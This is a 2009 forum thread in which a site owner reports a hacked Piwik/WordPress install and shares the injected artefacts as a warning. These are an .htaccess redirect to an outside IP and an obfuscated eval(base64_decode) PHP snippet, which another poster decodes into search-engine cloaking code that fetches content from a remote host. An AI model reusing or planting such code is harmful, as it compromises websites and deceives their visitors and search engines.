1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

To anyone using piwik 0.4.5; seems it's hackable

Discussion in 'Black Hat SEO Tools' started by MuonTrail, Nov 23, 2009.

  1. MuonTrail

    MuonTrail Registered Member

    Joined:
    Mar 5, 2009
    Messages:
    96
    Likes Received:
    93
    Just noticed today that my piwik install got hacked. Not exactly sure how yet, but this is what it looks like he did.

    This was added to my htaccess

    Code:
    RewriteRule .* http://91.207.4.19/tds/go.php?sid=1 [R,L]
    And this lovely snippet was added to my index.php

    Code:
    eval(base64_decode("aWYoc3RyaXBvcygkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sICdnb29nbGUnKSBvciBzdHJpcG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwgJ3lhaG9vJykgb3Igc3RyaXBvcygkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sICdtc24nKSBvciBzdHJpcG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwgJ2xpdmUnKSkNCnsNCiAgJHIgPSAnJzsNCiAgaWYoJGY9QGZzb2Nrb3BlbignOTEuMjA3LjQuMTgnLDgwLCRlLCRlciwxMCkgYW5kIEBmcHV0cygkZiwgIkdFVCAvbGlua2l0L2luLnBocD9kb21haW49IiAuIHVybGVuY29kZSgkX1NFUlZFUlsiU0VSVkVSX05BTUUiXSkgLiAiJnVzZXJhZ2VudD0iIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgLiAiIEhUVFAvMS4wXHJcbkhvc3Q6IDkxLjIwNy40LjE4XHJcblxyXG4iKSkNCiAgd2hpbGUoICRsID0gZnJlYWQoJGYsIDEwMjQpKSAkciAuPSAkbDsNCiAgQGZjbG9zZSgkZik7DQogICRwPXN0cnBvcygkciwiXHJcblxyXG4iKTsgZWNobyBzdWJzdHIoJHIsJHArNCk7DQp9"));
    I haven't really dug into this yet. Just wanted to give a quick heads up to anyone who might be using piwik to check their installs.
     
  2. Alex Brooks

    Alex Brooks BANNED BANNED

    Joined:
    Mar 17, 2009
    Messages:
    1,199
    Likes Received:
    297
    How do you know that this was a fault of Piwiks?
     
  3. sonneti

    sonneti Regular Member

    Joined:
    Jan 27, 2009
    Messages:
    205
    Likes Received:
    127
    I know f'all about php but i'd guess it is redirecting your search engine traffic?

    Code:
    if(stripos($_SERVER[\'HTTP_USER_AGENT\'], \'google\') or stripos($_SERVER[\'HTTP_USER_AGENT\'], \'yahoo\') or stripos($_SERVER[\'HTTP_USER_AGENT\'], \'msn\') or stripos($_SERVER[\'HTTP_USER_AGENT\'], \'live\'))
    {
      $r = \'\';
      if($f=@fsockopen(\'91.207.4.18\',80,$e,$er,10) and @fputs($f, "GET /linkit/in.php?domain=" . urlencode($_SERVER["SERVER_NAME"]) . "&useragent=" . urlencode($_SERVER[\'HTTP_USER_AGENT\']) . " HTTP/1.0\\r\\nHost: 91.207.4.18\\r\\n\\r\\n"))
      while( $l = fread($f, 1024)) $r .= $l;
      @fclose($f);
      $p=strpos($r,"\\r\\n\\r\\n"); echo substr($r,$p+4);
    }
    
     
  4. MuonTrail

    MuonTrail Registered Member

    Joined:
    Mar 5, 2009
    Messages:
    96
    Likes Received:
    93
    Well, I'm not sure it was piwik anymore. I finally had time to start digging into it and he got all my website on that host. The most likely suspect is one of my wordpress installs. Probably a bad plugin. Meh.

    I was thinking search engine spider traffic... after all, traffic I get from the search engines shouldn't show the name of the search engine in the user-agent would they, I don't think?

    The code he base64'd just returned (at the time) an empty hidden div, which would have been added at the end of my pages. Though I can't imagine what he would possibly want to do with spider traffic. And I still haven't figured out what he exploited. Meh.

    So it was a false alarm for piwik. But if you use a crap-load of plugins on your wordpress sites you might want to do periodic checks. :rolleyes: